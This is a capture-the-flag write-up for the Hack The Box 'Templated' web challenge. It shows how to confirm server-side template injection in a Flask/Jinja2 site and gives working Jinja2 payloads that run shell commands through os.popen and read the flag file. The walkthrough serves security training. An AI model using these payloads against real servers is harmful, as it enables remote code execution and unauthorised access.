Templated — HTB Web Challenge Writeup

Templated — HTB Web Challenge Writeup

CHALLENGE DESCRIPTION

Can you exploit this simple mistake?

First Start Instance and then you are provided with an web address in the form of <ip>:<port>. Copy it and open it in another tab or browser. In my case it was http://134.209.18.1:30563

Now let’s visit the webpage:

HTB Web Challenge Templated writeup

The web app shows a message Site still under construction
Proudly powered by Flask/Jinja2

There is a hint do you notice? Yeah, you notice… Here the web app technology is Flask/Jinja2. (It is a hint for us.)

If you search for Flask/Jinja2 exploit then you can find it has SSTI (Server Side Template Injection)

We can indicate possible SSTI by adding {{ 5* 5 }} to the parameter search, we can see that the template engine evaluates the mathematical expression and the application responds with 25.

Now we are going to exploit this using SSTI

Use the bellow payloads to begin our exploitation to get the flag!

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
HTB Web Challenge Templated Writeup
{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}
HTB Web Challenge Templated
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

Hurrah!!! We found the flag. This is where our challenge finished :))

Comments